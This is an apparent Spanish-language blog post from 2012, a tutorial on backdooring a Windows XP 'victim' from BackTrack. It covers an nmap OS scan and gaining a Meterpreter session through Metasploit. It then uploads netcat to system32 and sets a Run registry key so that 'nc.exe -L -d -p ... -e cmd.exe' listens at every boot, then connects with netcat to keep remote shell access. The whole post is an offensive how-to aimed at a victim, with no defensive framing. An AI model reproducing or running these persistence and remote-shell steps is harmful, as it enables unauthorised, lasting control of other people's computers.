Vistas de página en total

jueves, 13 de diciembre de 2012

BACKDORIZANDO XP DESDE BACKTRACK CON MSF

lo primero que necesitamos saber es la IP de la victima, después de saber la IP, nos vamos a BACKTRACK y haremos un escaneo con nmap, haremos un escaneo silencioso que nos diga cual sistema operativo corre la victima, entonces, el escaneo lo haremos así:

nmap -sS -O (IP de la victima)

como podemos ver en la imagen, la IP de la victima (xp) es 192.168.1.5
el paso a seguir es copiar en el escritorio de BACKTRACK, el archivo que nos creara la puerta trasera (BACKDOOR), el archivo se llama nc.exe (nc es la abreviatura de netcat). 
ahora si, procederemos con nuesttro escaneo.
el escaneo informa, sobre los puertos abiertos en la victima y el sistema operativo que esta corriendo.
ahora ejecutaremos METASPLOIT en una terminal, digitando el comando #msfconsole, para poder cargar el exploit que usaremos.
teniendo ya seleccionado nuestro exploit, pasaremos a configurar un PAYLOAD con su debida configuración:

1. LHOST (ip local)
2. RHOST (ip remota)
3. exploit (lanzarlo)
después de haber lanzado el exploit, vemos que METERPRETER nos muestra una sesión abierta en la victima.
ahora, mediante METERPRETER subiremos el archivo nc.exe, que tenemos copiado en el escritorio de BACKTRACK a la carpeta system32 de la victima.
ahora iremos a los registros de WINDOWS para ver que esta ejecutando actualmente.
esto lo haremos digitando la siguiente linea de comandos.

>reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN 
ahora vamos a alterar los valores de los registros de WINDOWS en H_KEY_LOCAL_MACHINE (HKLM), y esto lo haremos con el siguiente comando.

>reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c: \\WINDOWS\\system32\\nc.exe "-L -d -p (puerto) -e cmd.exe".
ahora correremos nuevamente el comando:
 reg enumkey -kkHKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
para verificar que el BACKDOOR si quedo en los registros de HKLM.
efectivamente, el BACKDOOR está en los registros, ahora lo que haremos será reiniciar la maquina de la victima (xp), lo cual haremos con el comando >reboot.
vemos que esta reiniciando la maquina de la victima.
ahora solo queda abrir una terminal en BACKTRACK y digitar el siguiente comando.

#nc (IP de la victima) (puerto)
#nc 192.168.1.5 1111

con esto ya estamos dentro cada vez que la victima inicie sesión!!!!!